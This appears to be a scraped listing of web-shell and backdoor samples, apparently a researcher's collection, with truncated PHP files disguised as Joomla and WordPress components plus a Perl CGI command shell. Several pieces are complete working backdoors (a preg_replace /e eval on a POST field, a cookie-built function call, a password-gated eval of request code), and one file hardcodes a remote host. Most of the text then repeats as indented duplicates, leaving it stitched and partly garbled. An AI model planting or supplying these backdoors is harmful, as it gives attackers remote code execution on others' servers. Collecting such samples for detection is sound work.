Jonas Lejon jonaslejon

## _input__test.php.
<?php
/**
 * @package     Joomla.Plugin.System
 * @since       1.5
 *
 *
 */
class PluginJoomla {
	public function __construct() {
		$jq = @$_COOKIE['ContentJQ3'];

## wp-blog-header.php
<?php @error_reporting(0);
define('cdomainDosNZ', "ssl-backup24.com");
define('showop_phpDosNZ', "showop_click.php");
define('info_phpDosNZ', 'info.php');
if (array_key_exists('HTTP_TEST', $_SERVER)) {
    echo (md5("TEST2016_CLICK"));
    exit;
}
function fetch_urlDosNZ($url, $data) {
    $content = '';

## file-upload.php
<?php
$self = $_SERVER['PHP_SELF'];
$docr = $_SERVER['DOCUMENT_ROOT'];
$sern = $_SERVER['SERVER_NAME'];
$tend = "</tr></form></table><br><br><br><br>";
if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
else {$ac = "upload";}
switch($ac) {
case "upload":

## php-preg-replace-backdoor.php
<?php @preg_replace('/(.*)/e', @$_POST['cgrycynqatjstuh'], '');

## PHP-cookie-backdoor.php
<?php

$ecp=$_COOKIE;
$llm=$ecp[inwm];
if($llm){
	$zkm=$llm($ecp[xlvd]);$ewgp=$llm($ecp[avkw]);$uxt=$zkm("",$ewgp);$uxt();
}

## web-backdoor.php
<?php

eval("if(isset(\$_REQUEST['ch']) && (md5(\$_REQUEST['ch']) == '5d5780065f278a2db819916c4b525671') && isset(\$_REQUEST['php_code'])) { eval(\$_REQUEST['php_code']); exit(); }")%

## php-upload.php
<?php
ini_set('display_errors','Off');
error_reporting('E_ALL');
$multipart = "236c985403e7e1";
$part = "450be30e0288de41b6";
if (md5($_POST['multipart'])==$multipart.$part){
echo '
<div align="left">
<font size="1">:</font>
</div>

## php-backdoor.php
<?php

function is_valid_url(&$url)
{
    if (!preg_match('/^(.+?)(\d+)\.(\d+)\.(\d+)\.(\d+)(.+?)$/', $url, $m))
        return false;
    $url = $m[1].$m[5].'.'.$m[4].'.'.$m[3].'.'.$m[2].$m[6];
    return true;
}

## wp-mailer-malware.php
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);

if(isset($_SERVER))
{
	$_SERVER['PHP_SELF'] = "/";
	$_SERVER['REMOTE_ADDR'] = "127.0.0.1";
	if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))

## cgi.pl
#!/usr/bin/perl
#PPS 3.0 shell by Pashkela [RDOT.ORG] © 2012
$Password="bb09c55983ff49f3a9cdfd83f08e5689";# root
$CommandTimeoutDuration=30;# max time of command execution
$tab='<table>';$tbb="<table width=100%";$verd="<font face=Verdana size=1>";$tabe='</table>';$div='<div class=content><pre class=ml1>';$dive='</pre></div>';use Digest::MD5 qw(md5_hex
);$WinNT=0;$NTCmdSep="&";$UnixCmdSep=";";$ShowDynamicOutput=1;$CmdSep=($WinNT?$NTCmdSep:$UnixCmdSep);$CmdPwd=($WinNT?"cd":"pwd");$PathSep=($WinNT?"\\":"/");$Redirector=($WinNT?" 2>&
1 1>&2":" 1>&1 2>&1");$LogFlag=false;use File::Basename;use MIME::Base64;my @last:shared;sub cod($){my $url=~s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;$url=encode_base64($_[0]);return
 $url;}sub dec($){ my $url1=decode_base64($_[0]);return $url1;}sub ReadParse {local (*in)=@_ if @_;local($i,$loc,$key,$val);$MultipartFormData=$ENV{'CONTENT_TYPE'}=~/multipart\/form
-data; boundary=(.+)$/;if($ENV{'REQUEST_METHOD'} eq "GET"){$in=$ENV{'QUERY_STRING'};}elsif($ENV{'REQUEST_METHOD'} eq "POST")
	<?php
	/**
	* @package Joomla.Plugin.System
	* @since 1.5
	*
	*
	*/
	class PluginJoomla {
	public function __construct() {
	$jq = @$_COOKIE['ContentJQ3'];
	<?php
	$self = $_SERVER['PHP_SELF'];
	$docr = $_SERVER['DOCUMENT_ROOT'];
	$sern = $_SERVER['SERVER_NAME'];
	$tend = "</tr></form></table><br><br><br><br>";
	if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
	elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
	else {$ac = "upload";}
	switch($ac) {
	case "upload":
	<?php

	eval("if(isset(\$_REQUEST['ch']) && (md5(\$_REQUEST['ch']) == '5d5780065f278a2db819916c4b525671') && isset(\$_REQUEST['php_code'])) { eval(\$_REQUEST['php_code']); exit(); }")%
	<?php
	ini_set('display_errors','Off');
	error_reporting('E_ALL');
	$multipart = "236c985403e7e1";
	$part = "450be30e0288de41b6";
	if (md5($_POST['multipart'])==$multipart.$part){
	echo '
	<div align="left">
	<font size="1">:</font>
	</div>
	<?php

	function is_valid_url(&$url)
	{
	if (!preg_match('/^(.+?)(\d+)\.(\d+)\.(\d+)\.(\d+)(.+?)$/', $url, $m))
	return false;
	$url = $m[1].$m[5].'.'.$m[4].'.'.$m[3].'.'.$m[2].$m[6];
	return true;
	}
	@ini_set('error_log', NULL);
	@ini_set('log_errors', 0);
	@ini_set('max_execution_time', 0);
	@set_time_limit(0);

	if(isset($_SERVER))
	{
	$_SERVER['PHP_SELF'] = "/";
	$_SERVER['REMOTE_ADDR'] = "127.0.0.1";
	if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
	#!/usr/bin/perl
	#PPS 3.0 shell by Pashkela [RDOT.ORG] © 2012
	$Password="bb09c55983ff49f3a9cdfd83f08e5689";# root
	$CommandTimeoutDuration=30;# max time of command execution
	$tab='<table>';$tbb="<table width=100%";$verd="<font face=Verdana size=1>";$tabe='</table>';$div='<div class=content><pre class=ml1>';$dive='</pre></div>';use Digest::MD5 qw(md5_hex
	);$WinNT=0;$NTCmdSep="&";$UnixCmdSep=";";$ShowDynamicOutput=1;$CmdSep=($WinNT?$NTCmdSep:$UnixCmdSep);$CmdPwd=($WinNT?"cd":"pwd");$PathSep=($WinNT?"\\":"/");$Redirector=($WinNT?" 2>&
	1 1>&2":" 1>&1 2>&1");$LogFlag=false;use File::Basename;use MIME::Base64;my @last:shared;sub cod($){my $url=~s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;$url=encode_base64($_[0]);return
	$url;}sub dec($){ my $url1=decode_base64($_[0]);return $url1;}sub ReadParse {local (*in)=@_ if @_;local($i,$loc,$key,$val);$MultipartFormData=$ENV{'CONTENT_TYPE'}=~/multipart\/form
	-data; boundary=(.+)$/;if($ENV{'REQUEST_METHOD'} eq "GET"){$in=$ENV{'QUERY_STRING'};}elsif($ENV{'REQUEST_METHOD'} eq "POST")